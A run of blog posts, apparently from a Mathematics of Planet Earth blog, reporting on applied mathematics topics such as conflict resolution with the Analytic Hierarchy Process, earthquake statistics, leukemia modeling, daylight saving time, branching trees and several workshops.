The November issue of the AMS Notices has an intriguing article about the use of mathematics to help solve the Middle East Conflict. The authors, Thomas L. Saaty and H. J. Zoffer, discuss how the Analytic Hierarchy Process (AHP) can to used to help sort out the complex issues of the Israeli-Palestinian conflict. In their words, the advantages of the AHP in dealing with conflicts is “that the process creatively decomposes complex issues into smaller and more manageable segments. It also minimizes the impact of unrestrained emotions by imposing a mathematical construct, pairwise comparisons and prioritization with a numerical ordering of the issues and concessions.” The article reports in detail (and fills in some of the mathematics at its core) on a meeting of the two sides held in Pittsburgh, Pennsylvania in August of 2011, where important progress was made in addressing the critical issues of the conflict. The Pittsburgh Principles were the outcome of that meeting and they are described at the end in the article. The article is available here.

Estelle Basor
AIM

Posted in Mathematics, Political Systems, Social Systems | Leave a comment

SAMSI Workshop – Dynamics of Seismicity, Earthquake Clustering and Patterns in Fault Networks

Despite considerable research, earthquake dynamics remains one of the major challenges in geophysics. A recent workshop on Dynamics of Seismicity, Earthquake Clustering and Patterns in Fault Networks at SAMSI in Research Triangle Park, North Carolina, was organized to achieve progress in this field by taking advantage of newly available data sets and statistical techniques. The workshop was part of the international program “Mathematics of Planet Earth 2013” and was organized in cooperation with the Bernoulli Society for Mathematical Statistics and Probability via the Committee on Probability and Statistics in Physical Sciences and the International Union of Geodesy and Geophysics via the Commission on Mathematical Geophysics.

The main goal of the workshop was to build and strengthen emerging links between active research groups in different scientific areas—statistics, probability, mathematics, physics, seismology and computer science—toward achieving a solid understanding of seismicity patterns and structures and a physical theory for earthquake dynamics. The workshop highlighted the key role of the mathematical sciences in studying seismicity dynamics in relation to properties of faults and the Earth’s crust.

SAMSI Workshop on Seismicity

Quality and availability of seismic data was one of the workshop topics. Many studies of seismicity are based on regional or global earthquake catalogs. Regional seismic networks in the US usually produce these catalogs. The global ComCat catalog of USGS/ANSS is a merged version of all catalogs produced in the US, including the global NEIC catalog.  Most seismic networks also produce real-time catalogs automatically, but these are usually of lesser quality than the human reviewed catalogs. As real-time catalogs improve and the cost of producing human reviewed catalogs increases, network operators and the researchers are faced with the questions if the real-time catalogs are sufficient. This question is particularly pressing in the current budget climate, which has already had a negative impact on catalog production. The real-time catalogs meet the need for rapid notification to emergency managers; however, they may not provide accurate count of small earthquakes, and in some cases magnitudes for events less than M3 may be incorrect or a few events may be mislocated. The research community that works with seismicity catalogs could provide minimum quality criteria for seismicity catalogs, which can be used to judge which catalogs are of sufficient quality to be used for seismicity research.

SAMSI Workshop on Seismicity

The workshop participants discussed several key topics related to earthquake dynamics: (i) State-of-the-art seismic data and its complexity (Egill Hauksson, Caltech, and Yehuda Ben-Zion, USC), (ii) Earthquake clustering and triggering (Zhigang Peng, Georgia Tech; Ilya Zaliapin, U of Nevada, Reno; and Joern Davidsen, U of Calgary), (iii) Statistical and mathematical modeling and forecasting (Antoinette Tordesilla, U of Melbourne; Bala Rajaratnam, Stanford; Philip Stark, UC Berkeley, Dave Harte, Statistical Research Associates, New Zealand; and Karin Dahmen, U of Illinois Urbana/Champaign).

Further information can be found at the workshop site.

Yehuda Ben-Zion, University of Southern California
Jörn Davidsen, University of Calgary
Egill Hauksson, California Institute of Technology
Ilya Zaliapin, University of Nevada, Reno

Posted in Geophysics, Statistics, Workshop Report | Leave a comment

Extracting Boats in Harbors from High-resolution Satellite Images

Do you know that over 50 satellites are launched every year to orbit the Earth? Have you ever wondered what the purpose of those satellites is? Here is one of them!

With the launch of the first satellite, a new way of gathering information about the Earth’s surface has emerged. Highly sophisticated cameras are built on the satellites to obtain very high resolution images. Satellites nowadays provide images at a resolution of 0.3 meters! It means that you can even identify your own scooter! Huge amounts of data are collected every day using these cameras. Still, all this data is meaningless, unless the images are further analyzed and understood.

A first step in understanding what is represented in an image is to identify the objects which it contains. We will focus here on identifying boats in harbor images. Boat extraction in harbors is a preliminary step in obtaining more complex information from images such as traffic flow within the harbor, unusual events, etc.

When you look at a satellite image of a harbor, you can visually detect the boats based on their characteristics such as the fact that they are usually in water, their white color or their elliptical shape. All these characteristics make it easy for us humans to correctly identify the boats and discriminate them from other objects such as cars, buildings or trees. Nevertheless, humans know the concept of a boat, while computers don’t. Tell a computer to identify a boat and it won’t know what you’re talking about.

In order to use a computer to detect boats, one must first identify all the characteristics that make a boat unique. Some of them were mentioned before, can you think of others? Once you write down a list of all such characteristics, you then have to define them in a mathematical manner. Put all these mathematical characteristics together and you have developed a mathematical model for boats in harbors. Keep in mind that you must model both the boat itself, as well as the relationships between the boats. One example of a relationship between two boats is the fact that they are usually not allowed to overlap. Note that if the final result is not satisfying, it probably means that the model is poor and you should try to improve it!

The last step is to integrate this model into a framework that allows you to extract only those objects that fit the model and neglect all others. Probabilities play an important role in this step. The computer will search for a configuration of objects until it finds the one that best describes the real data in the image. In the best case scenario you’ll end up with a configuration that incorporates all the boats in the harbor and can then move on to doing more interesting stuff with it!

Paula Crăciun and Josiane Zerubia
INRIA Sophia-Antipolis Méditerranée
BP 93, 2004 Route des Lucioles
06902 Sophia-Antipolis Cedex – France
URL: https://team.inria.fr/ayin/

Posted in Imaging | Leave a comment

Changing our Clocks

This Sunday, most of the United States and Canada changes from Daylight Saving Time (DST) to Standard Time: at 2:00 a.m. local time, clocks fall back to 1:00 a.m. This event, which happens every year on the first Sunday in November, is the reverse of what happens in the spring: on the second Sunday in March at 2:00 a.m., clocks spring forward to 3:00 a.m.

Effectively, DST moves an hour of daylight from the morning to the evening. The modern idea of daylight saving was first proposed by the New Zealand entomologist George Vernon Hudson in 1895 in a paper to the Wellington Philosophical Society [1]. It was first implemented on April 30, 1916, by Germany and its war-time ally Austria-Hungary as a way to conserve coal.

This annual ritual does not happen everywhere and does not happen everywhere at the same time. In the U.S. and Canada, each time zone switches at a different time. DST is not observed in Hawaii, American Samoa, Guam, Puerto Rico, the Virgin Islands, the Commonwealth of Northern Mariana Islands, and Arizona. The Navajo Nation participates in the DST policy, even in Arizona, due to its large size and location in three states. However, the Hopi Reservation, which is entirely surrounded by the Navajo Nation, doesn’t observe DST. In effect, there is a donut-shaped area of Arizona that does observe DST, but the “hole” in the center does not.

The timing of the changeover, 2:00 a.m., was originally chosen because it was practical and minimized disruption. Most people were at home and this was the time when the fewest trains were running. It is late enough to minimally affect bars and restaurants, and it prevents the day from switching to yesterday, which would be confusing. It is early enough that the entire continental U.S. switches by daybreak, and the changeover occurs before most early shift workers and early churchgoers are affected.

In the U.S., the dates of the changeover were set in 2007. Widespread confusion was created during the 1950s and 1960s when each U.S. locality could start and end DST as it desired. One year, 23 different pairs of DST start and end dates were used in Iowa alone. For exactly five weeks each year, Boston, New York, and Philadelphia were not on the same time as Washington D.C., Cleveland, or Baltimore—but Chicago was. And, on one Ohio to West Virginia bus route, passengers had to change their watches seven times in 35 miles!

The Minnesota cities of Minneapolis and St. Paul once didn’t have twin perspectives with regard to the clock. These two large cities are adjacent at some points and separated only by the Mississippi River at others, and are considered a single metropolitan area. In 1965, St. Paul decided to begin its Daylight Saving Time period early to conform to most of the nation, while Minneapolis felt it should follow Minnesota’s state law, which stipulated a later start date. After intense inter-city negotiations and quarreling, the cities could not agree, and so the one-hour time difference went into effect, bringing a period of great time turmoil to the cities and surrounding areas.

Indiana has long been a hotbed of DST controversy. Historically, the state’s two western corners, which fall in the Central Time Zone, observed DST, while the remainder of the state, in the Eastern Time zone, followed year-round Standard Time. An additional complication was that five southeastern counties near Cincinnati and Louisville unofficially observed DST to keep in sync with those cities. Because of the longstanding feuds over DST, Indiana politicians often treated the subject gingerly. In 1996, gubernatorial candidate Rex Early firmly declared, “Some of my friends are for putting all of Indiana on Daylight Saving Time. Some are against it. And I always try to support my friends.” In April 2005, Indiana legislators passed a law that implemented DSTstatewide beginning on April 2, 2006.

The North American system is not universal. The countries of the European Union use Summer Time, which begins the last Sunday in March (one or two weeks later than in North America) and ends the last Sunday in October (one week earlier than in North America). All time zones change at the same moment, at 1:00 a.m. Universal Time (the successor of Greenwich Mean Time).

The only African countries and regions which use DST are the Canary Islands, Ceuta and Melilla (Spain), Madeira (Portugal), Morocco, Libya, and Namibia.

In Antarctica, there is no daylight in the winter and months of 24-hour daylight in the summer. But many of the research stations there still observe Daylight Saving Time anyway, to synchronize with their supply stations in Chile or New Zealand.

Proponents of DST generally argue that it saves energy, while opponents argue that actual energy savings are inconclusive. DST’s potential to save energy comes primarily from its effects on residential lighting, which consumes about 3.5% of electricity in the United States and Canada [2]. Delaying the nominal time of sunset and sunrise reduces the use of artificial light in the evening and increases it in the morning. As Franklin’s 1784 satire pointed out, lighting costs are reduced if the evening reduction outweighs the morning increase, as in high-latitude summer when most people wake up well after sunrise. An early goal of DST was to reduce evening usage of incandescent lighting, formerly a primary use of electricity. Although energy conservation remains an important goal, energy usage patterns have greatly changed since then, and recent research is limited and reports contradictory results. Electricity use is greatly affected by geography, climate, and economics, making it hard to generalize from single studies [2].

References:

[1] G. V. Hudson (1895). “On seasonal time-adjustment in countries south of lat. 30°”. Transactions and Proceedings of the New Zealand Institute 28: 734.

[2] Myriam B.C. Aries and Guy R. Newsham (2008). “Effect of daylight saving time on lighting energy use: a literature review”. Energy Policy 36 (6): 1858–1866. doi:10.1016/j.enpol.2007.05.021.

Posted in Energy, General | Leave a comment

Mathematical Modeling and Leukemia

A multidisciplinary group of mathematicians, biologists and hematologists from Romania is involved in developing new mathematical models of leukemia, with the goal to help the medical community better understand the disease and develop adequate treatment routines. Since for a certain patient, the evolution of the disease strongly depends on the features of his/her disease (or on specific parameters – mathematically speaking), these treatment strategies should be adapted to the patient characteristics.

Commonly, leukemia is defined as a cancer characterized by an abnormal proliferation of blood cells, caused by pathological modifications of hematopoiesis. Hematopoiesis is the process of production of all types of blood cells that includes formation, development and differentiation. At the origin of all blood cells are the hematopoietic stem cells.

When a hematopoietic stem cell enters into the cycle, it can undergo three types of division:

–       Symmetric self-renewal, meaning that from a stem cell, after division, two identical stem cells will appear;

–       Asymmetric division – from a stem cell will result another stem cell and a more differentiated cell (progenitors);

–       Symmetric differentiation – from a stem cell will result two progenitors.

The capacity of a hematopoietic cell to proliferate is decreasing during the process of differentiation and maturation, such that a mature cell looses this ability. The cells with self-renewal ability are called stem-like cells.

There are many types of leukemias, classified according to the type and age of the cell involved in malignant transformation, so leukemias can be myeloid or lymphoid, acute or chronic. One of the most studied types of leukemia, also from a mathematically approach, is Chronic Myelogenous Leukemia (CML). The disease is believed to arise from a hematopoietic stem cell in the earliest phase of development. A chromosomal abnormality is responsible for the initiation of the disease. This abnormality is a reciprocal translocation between one chromosome 9 and one chromosome 22, the consequence being one chromosome 9 longer than normal and one chromosome 22 shorter than normal. The latter is called Philadelphia chromosome and is denoted Ph. The consequence of this process is a fusion gene causing the production of an abnormal tyrosine kinase protein, called Bcr-Abl, which is the origin of the transformation of normal hematopoietic cells to abnormal leukemic cells.

For more than 10 years, there is a standard treatment against CML, namely Imatinib mesylate, a molecular targeted drug, which is highly specific to binding with Bcr-Abl. In this way, it blocks the abnormal protein and thus removes the proliferative advantage that it provides to cancer cells. Under Imatinib, almost all patients attain hematological remission and 80% attain complete cytogenetic remission, and an estimated overall survival of 93%. at 10 years.  However, Imatinib does not always completely eradicate residual leukemia cells and some patients might relapse once the treatment is stopped.

It is commonly accepted that a quantitative understanding of cancer biology needs the development of a mathematical framework to describe the fundamental principles leading to tumor initiation and expansion. Accordingly, mathematical models can be used to study cancer initiation, progression and responses to therapy. Only when the dynamics of cancer cells during therapy is understood, quantitatively precise predictions can be made about treatment success, cancer cell kinetics or therapy failure due to resistance. Thus, mathematical models are important to a complete understanding of targeted therapy.

The process of hematopoiesis, implying the cell cycle, can be described by a feedback model that uses delay differential equations (DDE) for the time evolution of the densities of cell populations involved. Such a model was first initiated by M. C. Mackey and L. Glass (see, e. g. [3]) for stem cells.  When one concentrates on a single line of mature cells, leukocytes in the case of CML, two delays must be considered in the model, namely τ1 the duration of the cell cycle and τ2 the time needed for maturation.

A schematic representation of these interactions and terms involved is given below.


 

The time evolution of stem-like population is dependent on looses, through apoptosis (cell death) and through entering the cell cycle (including all kinds of proliferation: self-renew, asymmetric division and differentiation) and gains, due to the cells that entered the cell cycle τ1 time ago to self-renew or to divide asymmetrically and that leave the cell cycle and reinforce now the stem-like population. The time evolution of the mature population is dependent on looses through apoptosis and gains due to differentiation and asymmetric division. An amplification factor AN is used to describes the process of multiplication of cells through a series of divisions until they become mature cells. A linear treatment effect can be also considered when the CML cell populations are modeled.

 

A more realistic model considers four cell densities varying in time (i.e. state variable): x1 – the stem-like healthy cell population, x2 – the healthy mature cell population, y1 – the stem-like CML population and y2 – the mature cell population. With specific parameters values for healthy and leukemia cells, the model includes competition through the feedback Hill functions that model self-renewal and differentiation and that have to depend on the total cell densities. Treatment can be also introduced, acting specifically on apoptosis, on self-renewal and on differentiation rates.

One example is in the simulations below where one can see the evolution of healthy and leukemic cells when a constant treatment is considered

A more complex model can include in the picture the action of the immune system. The number of equations increases as well as the number of delays to be considered. Several new feedback loops regulate the interaction between the line cells of the immune system.

The study of the mathematical models starts usually by looking for equilibria and analyses their stability. Eventually a periodic evolution of the disease may be predicted due to the existence of a Hopf bifurcation when limit cycles appear. A new problem in this case is the analysis of the stability of these limit cycles (see [1]). Periodic evolutions can appear also in a context different from bifurcation of equilibria (see [2]).

Acknowledgement. The work described above has been supported by the CNCS Romania Grant ID-PNII-PCE-2011-3-0198. The team involved in these researches comprised also our colleagues S. Balea, D. Coriu, D. Candea, D. Jardan, M. Neamtu, and C. Safta.

References

[1] D. Candea, A. Halanay, I.R. Radulescu (2013), Stability analysis in a model for stem-like hematopoietic cells dynamics in leukemia under treatment, Ann. Acad. Rom. Sci., Ser. Math. Appl. 5, 1-2, 148-176.

[2] A. Halanay (2012),   Periodic solutions in a mathematical model for the treatment of chronic myelogenous leukemia, Mathematical Modeling of Natural Phenomena, vol.7, no.1, 235-244.

[3] Mackey, M.C. (1997), Mathematical models of hematopoietic cell replication and control, Case Studies in Mathematical Modeling–Ecology, Physiology and Cell Biology. New Jersey: Prentice-Hall, 151–182.

 

Andrei Halanay and Rodica Radulescu
Department of Mathematics and Informatics
University Politehnica of Bucharest
Bucharest, ROMANIA

Posted in Disease Modeling, Dynamical Systems | Leave a comment

Mathematics of Another Sphere

From October 9 – 13. 2013 many of the AIM staff were volunteering at a golf tournament, the Frys.com open. This is a PGA tour event and is a benefit to many charities including AIM. One of the days was designated AIM day to highlight the activities at AIM and one of the things the tournament directors asked us to do was make up a math+golf related quiz.

Now, we, like probably most mathematicians, don’t really think to much about the game of golf, but the quiz made us do a little investigating. One of the things we discovered was a wonderful talk by Doug Arnold, who does think quite a bit about golf! The talk, “Mathematics that Swings: the Math Behind Golf” is on YouTube.

This is a wonderful talk that starts off with some simple algebra and ends with hard problems in computation. Arnold discusses aspects such as mathematical models of a golfer’s swing based on a double pendulum, the impact of the club on the ball, and the effect of dimples on the flight of the ball. This last topic is quite interesting. Although the weight and diameter are set by the rules, the number and configuration of dimples is not, and no optimal configuration is known. It is, however, roughly understood how the dimples make the balls travel farther.

It may be a stretch to think of the mathematics of golf as an MPE topic, but it does reinforce the idea that mathematics is everywhere and the video is entertaining.

Estelle Basor
AIM

Posted in Computational Science, Dynamical Systems, Optimization | Leave a comment

Mathematics and Climate Research Network

The “Mathematics and Climate Research Network” (MCRN) held its annual meeting, October 7-12 in North Carolina.

The MCRN is a virtual organization. It brings together leading researchers across the US to study the mathematics that underlies climate science. Research is done collaboratively in focus groups over the Internet, and researchers get together once a year at the annual meeting to explore new ideas and set the agenda for upcoming activities.

The MCRN has connections with similar networks in the United Kingdom, the Netherlands, India, and Australia. After three years of operation, more than 100 researchers at about 50 institutions worldwide are currently affiliated with the Network. (You can find our pictures on the MCRN Web site under the “People” tab.) The Network is funded by a grant from the Division of Mathematical Sciences of the National Science Foundation.

This year’s annual meeting followed the format of previous meetings, with a Jr Researchers Meeting (October 7-9) followed by the Annual MCRN Meeting (October 10-11).

The Jr Researchers Meeting was held at the new Hampton Inn and Suites in Carrboro, near the campus of the University of North Carolina. It was attended by 34 Network participants, mostly grad students, postdocs, and junior faculty. This year’s technical talks focused on data assimilation, tipping points, and sea-ice interactions, and included a hands-on session on statistical techniques to analyze paleoclimate data for the presence of tipping points. A highlight of the meeting was a presentation on “Marine microbial processes: Climate Feedback and Model Formulation” by Professor Christof Meile from the Department of Marine Science at the University of Georgia. In addition, participants learned about preparing resumés, research statements and teaching statements for academic and non-academic jobs. Focus group sessions identified new research topics for the coming year and practiced the art of grant writing. Much of the instructional material (as well as curriculum materials, annotated reading lists, lecture notes, videos, and more) is available on the MCRN Web site under the tab “Education.”

The Annual Meeting was held at the offices of RENCI in Chapel Hill. (RENCI is the administrative center of the MCRN.) This meeting had 46 participants, including the senior researchers in the Network and many of the junior researchers. We heard reports from four Focus Groups:

  • Earth Orbitals
  • Tipping points
  • Ocean Circulation
  • Paleoclimate

In the past year, the Network held an internal competition for mini-grant proposals. Awards were made to the following projects (mentors in parentheses):

  • A Piecewise Smooth Conceptual Climate Model of the Neoproterozoic – Anna Barry and Esther Widiasih
  • Estimating non-global climate model parameters using ensemble Kalman filtering – Thomas Bellsky (Jesse Berwald and Lewis Mitchell)
  • Detection of critical transitions via topological methods (Jesse Berwald and Marian Gidea)
  • A Rigorous Analysis of the 4D-Var Estimation of Carbon Dioxide Surface Fluxes – Graham Cox and Sean Crowell (and Peter Rayner)
  • Conceptual Climate Models of Glacial/Interglaciation Cycles with Mixed Mode Oscillations – Andrew Roberts and Esther Widiasih
  • Phase Transitions in Arctic Melt Ponds – Ivan Sudakov (and Ken Golden and Yi-Ping Ma)
  • Testing Methods For The Detection Of Critical Transitions – Kaitlin Hill and Sarah Iams (and Jesse Berwald, Karna Gowda, Mary Silber, and Mary Lou Zeeman)
  • Mathematics of Climate Infographics in Teaching Calculus – Ivan Sudakov (and Alex Mahalov, Eric Kostelich and Tom Bellsky)

Each of the awardees gave a 5-minute presentation followed by 5 minutes of questions and discussion about future directions of the project.

On Thursday night, Professor Ken Golden (Department of Mathematics, University of Utah), delivered a public lecture on “Mathematics and the Melting Polar Ice Caps” at the Friday Center of the University of North Carolina. The lecture, which drew a large audience from the community, was followed by a poster and dessert reception.

The annual meeting has become an important focal point of the MCRN. While research is conducted over the Internet during most of the year, it is important to meet face-to-face at least once a year to introduce new members, identify new activities, and recharge the batteries. It makes sense to devote a separate meeting to the research activities of the junior members and to use the opportunity to improve their skills for the job market and future careers. The Annual Meeting serves a more forward-looking function; during the meeting much time was spent on planning future activities, both in the US and abroad in collaboration with the international partners. Organizing the two meetings back-to-back enhances the exchange of information and gets everyone involved in the planning process.

Posted in Climate, Mathematics, Workshop Report | Leave a comment

Two Books on Climate Modeling

I am normally a great fan of book reviews, but one which covered a book on a climate caught my attention. I was troubled with the review that appeared in the Philadelphia Inquirer because of the way it treated climate science in general and modeling in particular.

The book review, Digging deeper on climate change by Frank Wilson [Philadelphia Inquirer, October 13, 2013], concerned the book The Whole Story of Climate: What Science Reveals About the Nature of Endless Change by E. Kirsten Peters. Wilson wrote:

“Climate science, with its computer models, is a Johnny-come-lately to the narrative. Not so geology. ‘For almost 200 years,’ Peters writes, ‘geologists have studied the basic evidence of how climate has changed on our planet.’ They work, not with computer models, but with ‘direct physical evidence left in the muck and rocks.’ “

This seems to denigrate the role of models. It is certainly important to look to the past to better understand our climate –– its trends and the mechanisms that caused those trends. However, it is also important to understand the trends on a time scale that is much smaller than the geological — that is, since the beginning of the industrial revolution — and the role of increasing CO2 in atmosphere. Modeling the physics of the atmosphere and performing simulations using high performance computing play a crucial role in understanding the possible state of the climate in the next 100 years and beyond.

Contrast the observation in Wilson’s book review to a recent textbook on climate science by Hans Kaper and Hans Engler, Mathematics and Climate [SIAM, 2013]. This book, intended for master’s level students or advanced undergraduates, introduces students to “mathematically interesting topics from climate science.” It addresses a broad range of topics, beginning with the variability of climate over geologic history as gleaned from “proxy data” taken from deep-sea sediment cores. Certainly this variability informs our understanding of past climate history, including warming and cooling trends.

The book moves from data of past climate history on to models of the ocean and atmosphere, coupled with data, covering an interesting bit of mathematics along the way. For example, students are exposed to the role of salinity in ocean circulation models, and learn something about dynamical systems that are used in these models. To give another example to show the breadth of mathematical topics covered, various statistics and analytical tools are introduced and are used to analyze the Mauna Loa CO2 data.

Wilson, in his book review, states that “Using direct evidence rather than computer models, a geologist says a cold spell could be near.” That could be comforting news to some who want to ignore predictions of a warming planet, but it would be cold comfort. Mathematics, when used in the geosciences, tends to take a more balanced and calculating approach.

As Kaper and Engler point out in the preface to their book, “Understanding the Earth’s climate system and predicting its behavior under a range of ‘what if’ scenarios are among the greatest challenges for science today.” Physical modeling, mathematics, numerical simulation, and statistical analysis will continue to play a major role in addressing that challenge.

James Crowley
Executive Director
SIAM

Posted in Climate Modeling, Mathematics | Leave a comment

Thinking of Trees

It is October. Very soon the inspiring canvas of the Fall foliage will be gone and we will raise our eyes once in a while to enjoy an unexplained beauty of the branched architecture of the naked trees. Yet, there might be more than a shear aesthetic pleasure in those views and this is what today’s blog is about.

The Nature exhibits many branching tree-like structures beyond the botanical trees. River networks, Martian drainage basins, veins of botanical leaves, lung and blood systems, and lightening all can be represented as tree graphs. Besides, a number of dynamic processes like spread of a disease or rumor, evolution of an earthquake aftershock sequence, or transfer of gene characteristics from parent to children also can be described by a (time-oriented) tree. This would sound as a trivial observation if not for the following fact. A majority of rigorously studied branching structures is shown to be closely approximated by a simple two-parametric statistical model, a Tokunaga self-similar (TSS) tree. In other words, apparently diverse branching phenomena (think of Mississippi river vs. a birch tree) are statistically similar to each other, with the observed differences being related to the value of a particular model parameter rather than qualitative structural traits.

There exist two important types of self-similarity for trees. They are related to the Horton-Strahler and Tokunaga indexing schemes for tree branches. Introduced in hydrology in the mid 20-th century to describe the dendritic structure of river networks these schemes have been rediscovered and used in other applied fields since then.


We give below some definitions, which do not affect the later parts of this blog and can be safely skipped.

The Horton-Strahler indexing assigns orders to the tree branches according to their relative importance in the hierarchy. Namely, for a rooted tree T we consider the operation of pruning – cutting the leaves as well as the single-child chains of vertices that contain a leaf. Clearly, consecutive application of pruning eliminates any finite tree in a finite number of steps. A vertex in T is assigned order r if it is removed from the tree during the r-th application of pruning. A branch is a sequence of adjacent vertices with the same order.

Quite often, observed systems exhibit geometric decrease of the numbers Nr of branches of Horton-Strahler order r ³ 1; this property is called Horton self-similarity. The common ratio R of the respective geometric series is called the Horton exponent.

A stronger Tokunaga self-similarity addresses so-called side branching – merging of branches of distinct orders. In a Tokunaga tree, the average number of branches of order i ≥ 1 that join a branch of order (i+k), k ≥ 1 is given by Tk = ack-1. The positive numbers (a,c) are called Tokunaga parameters. Informally, the Tokunaga self-similarity implies that different levels of a hierarchical system have the same statistical structure, as is signified by the fact that Tk depends on the difference k between the child and parental branch orders but not on their absolute values.


A classical model that exhibits Horton and Tokunaga self-similarity is the critical binary Galton-Watson branching process (Burd et al., 2000), also known in hydrology as Shreve’s random topology model. This model has R = 4 and (a,c) = (1,2).

The general interest to fractals and self-similar structures in natural sciences during the 1990s led to a quest, mainly inspired and led by Donald Turcotte, for Tokunaga self-similar tree graphs of diverse origin. As a result, the Horton and Tokunaga self-similarity with a broad range of respective parameters have been empirically or rigorously established in numerous observed and modeled systems, well beyond river networks. This includes botanical trees, vein structure of botanical leaves, diffusion limited aggregation, two dimensional site percolation, nearest-neighbor clustering in Euclidean spaces, earthquake aftershock series, dynamics of billiards and some others (e.g., Newman et al., 1997; Turcotte et al., 1998; Kovchegov and Zaliapin, 2013 and references therein).

The increasing empirical evidence prompts the question: What basic probability models can generate Tokunaga self-similar trees with a range of parameters? (Or, more informally, do we see Tokunaga trees everywhere because of our inability to reject the Tokunaga hypothesis, or because of actual importance of the Tokunaga constraint?)

Burd et al. (2000) demonstrated that Tokunaga self-similarity is a characteristic property of the critical binary branching in the broad class of (not necessarily binary) Galton-Watson processes. Recently, Zaliapin and Kovchegov (2012) studied the level-set tree representation of time series (an inverse of the Harris path) and established Horton and Tokunaga self-similarity of a symmetric random walk and a regular Brownian motion. They also demonstrated Horton self-similarity of the Kingman’s coalescent process, and presented the respective Tokunaga self-similarity as a numerical conjecture (Kovchegov and Zaliapin, 2013). Other recent numerical experiments suggest that multiplicative and additive coalescents, as well as fractional Brownian motions also correspond to Tokunaga self-similar trees.

These results (i) expand the class of Horton and Tokunaga self-similar processes beyond the critical binary Galton-Watson branching, and (ii) suggest that simple models of branching, aggregation, and time series generically lead to the Tokunaga self-similarity. This makes the omnipresence of Tokunaga trees in observations less mysterious and opens an interesting avenue for further research. In particular, the equivalence of different processes via their respective tree representation (as is the case for Kingman’s coalescent and white noise, see Zaliapin and Kovchegov (2013)) may broaden the toolbox of empirical and theoretical exploration of various branching phenomena.

References:

G. A. Burd, E.C. Waymire, R.D. Winn, A self-similar invariance of critical binary Galton-Watson trees, Bernoulli, 6 (2000) 1–21.

Y. Kovchegov and I. Zaliapin, Horton self-similarity of Kingman’s coalescent tree, arXiv:1207.7108, 2013

W. I. Newman, D.L. Turcotte, A.M. Gabrielov, Fractal trees with side branching, Fractals, 5 (1997) 603–614.

D.L. Turcotte, J.D. Pelletier, and W.I. Newman, Networks with side branching in biology, J. Theor. Biol., 193 (1998) 577–592.

I. Zaliapin and Y. Kovchegov, Tokunaga and Horton self-similarity for level set trees of Markov chains, Chaos, Solitons & Fractals, 45, Issue 3 (2012) 358–372.

Ilya Zaliapin
Associate Professor
Department of Mathematics and Statistics
University of Nevada, Reno

Posted in Dynamical Systems, Mathematics, Patterns | Leave a comment

Fields Institute: Focus Program on Commodities, Energy and Environmental Finance

During August 2013, the Fields Institute in Toronto hosted a Focus Program on Commodities, Energy and Environmental Finance. The Focus Program addressed the interaction of markets and environment, including such MPE themes as sustainable development, effective risk management of weather events, and the role of finance in the production and consumption of energy. The busy month had a variety of activities, including three summer school mini-courses, two research workshops, and a lively seminar series. Nearly all events have been video recorded and archived, available for viewing any time.

Fields Institute: Focus Program on Commodities, Energy and Environmental Finance

A particular highlight was provided by two panel discussions that explored how mathematicians can contribute to environmental policy making. One of the panelists, Ron Dembo of Zerofootprint (a “cleantech” software company that was one of the sponsors of the Program and provided carbon offsets for participants’ travel) exhorted mathematicians to advocate for “hedging our climate”, i.e., applying quantitative risk-management techniques to assess the threat and response to climate change. Another panelist, Matheus Grasselli (McMaster) pointed out how mathematical methods are helping revitalize macroeconomic thinking about interaction between finance and the real economy, with similar implications for environmental action. There was also good industry involvement, particularly with participants from Electricité de France and Ontario Power Generation. Hans Tuenter from the latter utility gave an enlightening 90-minute tutorial on wind power and how subsidized renewables have led to negative power prices in Ontario.

Over 40 different presentations were delivered during the Program. Fred Benth (Oslo) explained how to stochastically model wind speeds at a given location (relevant for installing wind turbines), which led to discussion of recent developments in CARMA (continuous auto-regressive moving averages) models. Rene Carmona (Princeton) reviewed the contradictory evidence regarding influence of financial traders on commodity prices (so-called financialization). Almut Veraart (LSE) presented the newly developed theory of ambit fields, which generalize Gaussian random fields, that has applications for multivariate modeling of electricity prices; Michael Coulon (Princeton) discussed the detailed features of the New Jersey market for solar renewable energy certificates. A trio of talks by Minyi Huang (Carleton), Francois Delarue (Nice) and Daniel Lacker (Princeton), focused on latest results in the rapidly growing area of mean field games, which provides notions of stochastic equilibrium among infinitely many interacting agents. A number of talks (Mike Ludkovski, Xuwei Yang (both UCSB), and Ronnie Sircar (Princeton)) discussed the interplay between exploration for new fuels, the improvement in renewable technology and uncertain demand within a dynamic game-theoretic framework. Issues between electricity markets and carbon emissions were discussed both by mathematicians such as Mireille Bossy (INRIA), and economists such as Frank Wolak (Stanford).

Overall, the Focus Program was a great success, and has stimulated many new interactions among the participants. In particular, attendees commented on the multi-disciplinary developments currently taking place in the subject, with mathematicians, probabilists, statisticians, industrial and operations engineers, economists and finance practitioners all working simultaneously (and frequently together) on the same problems. We are planning a volume of papers devoted to work presented during the Focus Program to appear in Summer 2014. Commodities and environmental finance continues its rapid growth and is sure to bring forth many more developments in the near future.

Mike Ludkovski
Department of Statistics and Applied Probability
University of California Santa Barbara

Ronnie Sircar
Department of Operations Research and Financial Engineering
Princeton University

Posted in Energy, Finance, Risk Analysis, Sustainability, Workshop Report | Leave a comment

ICERM Workshop “From the Clinic to Partial Differential Equations and Back: Emerging Challenges for Cardiovascular Mathematics”

In recent years, there have been great advances in mathematical and computational modeling of cardiovascular phenomena. The ultimate goal is to develop predictive mathematical tools that can be used in medical decision-making and treatment. There has been notable success in some areas; for example, extensive numerical simulation is used in some hospitals to plan pediatric heart surgery. However, further progress is needed for the use of such mathematics-based methods to become widespread and routine. Additional advances will require close communication and collaboration between mathematical scientists and physiologists in order to guide further developments most effectively.

ICERM, the Institute for Computational and Experimental Research in Mathematics at Brown University, will host a workshop entitled “From the Clinic to Partial Differential Equations and Back: Emerging Challenges for Cardiovascular Mathematics,” January 20-24, 2014. The aim is to bring mathematicians and medical doctors together to foster collaboration on modeling the cardiovascular system. The workshop will be organized along two lines: “core topics” in mathematical and numerical methods that require further research; and “new challenges” arising from cardiovascular problems and diseases that have not been attacked extensively with numerical tools. The “core topics” will include fluid-structure interaction, multi-scale dynamics, and data assimilation. The “new challenges” will focus on liver circulation, cardiac re-synchronization therapy, chronic venous insufficiency, and coiling of intracranial aneurysms. The workshop format will include round-table discussions in small groups as well as lectures.

Cardiac Mathematics
More information about the workshop, including a current speaker and participant list, can be found here. Those interested in participating in the workshop are encouraged to apply online here. Limited funds are available for participant support; requests for funding can be indicated in the online application.

Posted in Workshop Announcement | Leave a comment

How Applied Mathematics Can Help Money Grow on Trees

Linear programming combines large numbers of simple rules to solve real-world problems

